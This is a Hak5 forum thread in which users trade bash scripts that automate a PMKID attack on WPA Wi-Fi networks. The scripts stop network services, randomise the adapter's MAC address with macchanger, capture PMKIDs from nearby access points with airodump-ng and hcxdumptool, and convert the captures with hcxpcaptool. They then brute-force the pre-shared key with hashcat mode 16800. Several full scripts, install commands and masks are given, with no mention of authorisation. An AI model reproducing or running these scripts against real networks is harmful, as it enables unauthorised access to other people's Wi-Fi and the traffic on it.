Jump to content
Hak5 Forums
vailixi

Help with PMKID cracking script? BASH

Recommended Posts

Posted (edited)

I was trying out this PMKID attack for WPA. I realized it was a lot of typing. There's a bit of manual installation for the tools so I wrote an install script. The install script works but I'm having trouble with getting the right output from airodump-ng. The script takes two arguments. ./pmkidcrack.sh <ESSID> <interface>

I want to run airodump for about 10 seconds and write to a csv file.
 

timeout 10 airodump-ng -w "${ESSID}" "${mon}"


Then get the MAC address that corresponds to the ESSID that I want to attack.
 

cat "${ESSID}-01.csv" | grep  $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > /root/mac.txt

There's probably some other stuff I'm doing wrong here but here's the script so far.

#!/bin/bash

ESSID=$1
INTERFACE=$2

systemctl stop NetworkManager
service wpa_supplicant stop
#change this
killall dhclient
airmon-ng check kill

#wifi=$(find /sys/class/net | grep wlx | cut -d '/' -f 5)

ifconfig $INTERFACE down
macchanger -r $INTERFACE
ifconfig $INTERFACE up
airmon-ng start $INTERFACE
mon=$(find /sys/class/net | grep mon | cut -d '/' -f 5)

##edit this shit

#timeout 10 airodump-ng -w $ESSID $mon

timeout 10 airodump-ng -w "${ESSID}" "${mon}"

cat "${ESSID}-01.csv" | grep  $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > /root/mac.txt
hcxdumptool -o hash -i $mon --filterlist=mac.txt --filtermode=2 --enable_status=3
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
rm /root/mac.txt "/root/${ESSID}-01.csv" /root/hashtocrack "/root/$ESSID-01.cap" "/root/${ESSID}-01.kismet.csv" "/root/${ESSID}-01.kismet.netxml"
rm mac.txt "${ESSID}-01.csv" hashtocrack "${ESSID}-01.cap" "${ESSID}-01.kismet.csv" "${ESSID}-01.kismet.netxml"
airmon-ng stop wlan0mon
systemctl start NetworkManager
service wpa_supplicant start
#change this
systemctl start dhclient
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

Also here's the install script for the dependencies. Might be different on your system. I've got about 2000 lines in my history on this install so things might already be installed. Let me know if you have some issues installing and what you did to fix them. Thanks.

#!/bin/bash

#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU

apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y
apt-get install opencl -y
apt-get install ocl-icd-opencl-dev -y

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install

git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install

git clone https://github.com/hashcat/hashcat
cd hashcat
make
make install

Tutorial for cracking PMKID

Edited by vailixi

Share this post


Link to post
Share on other sites

I love the first part of your script. I've been too lazy to write something like that myself even though after all these years I still go through the motions each time I want to fire up airmon/airodump.

I'm not sure what you're trying to do after:

On 9/1/2018 at 4:34 AM, vailixi said:

##edit this shit

I'm a terrible coder but from a practical perspective, why are you running airodump for 10secs and then running hcxdumptool? From the code it seems you are trying to output a list of the essids from airodump to feed into hcxdumptool filter list.

Hcxdumptool is independent of the aircrack/airodump suite. Hcx scans nearby devices on its own and performs all the attacks on any device broadcasting a beacon. You don't need to put the interface into monitor mode for hcx, it will do it on its own. i.e. hcxdumptool -o outputfile.pcapng --enable-status=3 -i $INTERFACE

You also need to clean up the output file for hashcat before you can run 16800 mode. i.e. hcxpcaptool -E essidlist.txt -z pmkidlist.txt outputfile.pcapng then you can run hashcat on the pmkidlist.txt

I'm not sure if I misunderstood your script and/or intentions but I will try editing it tonight and see what results I get.

Share this post


Link to post
Share on other sites

I didn't get to finish the script but it would go something like this:

#!bin/bash
killall NetworkManager && killall wpa_supplicant
ifconfig
read -p "select interface : " interface
echo""
ifconfig $interface down
macchanger -r $interface
ifconfig $interface up
hcxdumptool -o outputfile.pcapng --enable-status=3 -i $interface

I didn't get a chance to finish it but that would at least get you to the part where you are using pmkid attacks and outputting to outputfile.pcapng

 

Share this post


Link to post
Share on other sites

Wifite simple enough. Still learning about pmkid attacks though so. 

Edited by Bigbiz

Share this post


Link to post
Share on other sites
12 hours ago, Bigbiz said:

Wifite simple enough. Still learning about pmkid attacks though so. 

We all have our preferences ?

PMKIDs are just another way to crack the PSK instead of using a captured 4-way handshake. You still have to bruteforce the key with hashcat etc.

Share this post


Link to post
Share on other sites

hcxdumptool doesn't quit when it has the pmkid plus there is one more tool needed to convert what hcxdumptool gets to a hashcat crackable formatted hash.

I looked into automating these but not so simple.  I have been messing with scapy with 802.11 and it maybe possible to automate this in python.

You will need to setup a channel hopping beacon capture part to get access points.  You will need to setup a thread after that to handle association with scapy and monitor it once APs are found.  You will need a thread to begin authentication but not finish.  The pmkid is usually sent when the AP sends its ANounce.  You will just need to figure out how to create the 16800 hash that hashcat can understand to pass it to hashcat.  I been busy with a talk for a DevFest that happened here but am free and might look into this.  It maybe possible though depending on if you can get association and all that working.  You could try aireplay-ng for the association but it doesn't return anything to let you know if it is associated (no error codes or stuff).  if the AP os mac filtering then this can be an issue.

Share this post


Link to post
Share on other sites
On 10/31/2018 at 6:32 AM, icarus255 said:

I love the first part of your script. I've been too lazy to write something like that myself even though after all these years I still go through the motions each time I want to fire up airmon/airodump.

I'm not sure what you're trying to do after:

I'm a terrible coder but from a practical perspective, why are you running airodump for 10secs and then running hcxdumptool? From the code it seems you are trying to output a list of the essids from airodump to feed into hcxdumptool filter list. 

Hcxdumptool is independent of the aircrack/airodump suite. Hcx scans nearby devices on its own and performs all the attacks on any device broadcasting a beacon. You don't need to put the interface into monitor mode for hcx, it will do it on its own. i.e. hcxdumptool -o outputfile.pcapng --enable-status=3 -i $INTERFACE 

You also need to clean up the output file for hashcat before you can run 16800 mode. i.e. hcxpcaptool -E essidlist.txt -z pmkidlist.txt outputfile.pcapng then you can run hashcat on the pmkidlist.txt

I'm not sure if I misunderstood your script and/or intentions but I will try editing it tonight and see what results I get.

I was grabing the MAC addresses from airodump's output.

Edited by vailixi

Share this post


Link to post
Share on other sites
21 hours ago, PoSHMagiC0de said:

hcxdumptool doesn't quit when it has the pmkid plus there is one more tool needed to convert what hcxdumptool gets to a hashcat crackable formatted hash.

That's correct, you will need to run hcxpcaptool to strip the junk data and convert it to a hashcat format. Realistically speaking, the "hashcat format" (aka 16800 mode) is just:

PMKID:macAP:macStation:ESSID
(all hex encoded)

If you want to output these one by one into hashcat as you capture them (instead of using hcxpcaptool) then you will need to convert them into that relevant format as above... I'm not even going to try coding a script for that.

12 hours ago, vailixi said:

I was grabing the MAC addresses from airodump's output.

There's no need, hcxdumptool will grab them for you. The only thing that hcxdumptool/hcxpcaptool won't do is match the essids to the mac addresses and yea I feel your pain on that matter. You could have 3 captured PMKIDs listed and they could all be for the same AP but hcxdumptool will still treat them as 3 different/separate entries (meaning that you could be trying to crack the same PSK 3 times... if you don't crack it on your first attempt that is).

I can sort of understand where you guys are coming from because hcxdumptool is too automated which leads to duplicate entries as well as redundant attacks on randomised mac addresses. Either way, it's beyond my ability to streamline this process.

Try running wlanhcxinfo (more details on the captured handshakes/PMKIDs) or wlanhcx2ssid to strip the captures to one entry only. Hope this helps.

Share this post


Link to post
Share on other sites

I finished my script (not sure if that's what you had in mind with yours). There is a function in hcxdumptool that will do an "rca scan" which scans for APs and displays the channel, mac address, and essid. I couldn't get it to save to file though because either I'm using it incorrectly or there's a bug (I commented the line out so the rest of the script runs assuming you have a filterlist.txt file). Anyway, it's almost sun rise and I need to catch a few Zz.

#!bin/bash
sudo killall NetworkManager && sudo killall wpa_supplicant
ifconfig
read -p "select interface : " interface
echo""
sudo ifconfig $interface down
sudo macchanger -r $interface
sudo ifconfig $interface up
##sudo timeout 10 hcxdumptool --save_rcascan=filterlist.txt -i $interface
sudo timeout 60 hcxdumptool -o outputfile.pcapng --filterlist=filterlist.txt --filtermode=2 --enable_status=3 -i $interface
hcxpcaptool -E essidlist.txt -z pmkidlist.hash outputfile.pcapng
sudo service NetworkManager start
sudo service wpa_supplicant start
./hashcat64.bin -a 3 -m 16800 pmkidlist.hash ?d?d?d?d?d?d?d?d

 

Share this post


Link to post
Share on other sites

Looks good just copy paste then? I feel so script kiddy. Yuk

Share this post


Link to post
Share on other sites

Also on Ubuntu there is a daemon you have to uninstall  to get aircrack suite to work now. I can't remember the name of it right off hand.

Share this post


Link to post
Share on other sites

Ive have got it running in kali n convert with -j option to johnny wpapsk file. The hash has been sitting in johhnny for 15 hrs n still not cracked. Did i not capture pmkid, or still wait longer. I like hcxdump tool though. Nice

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×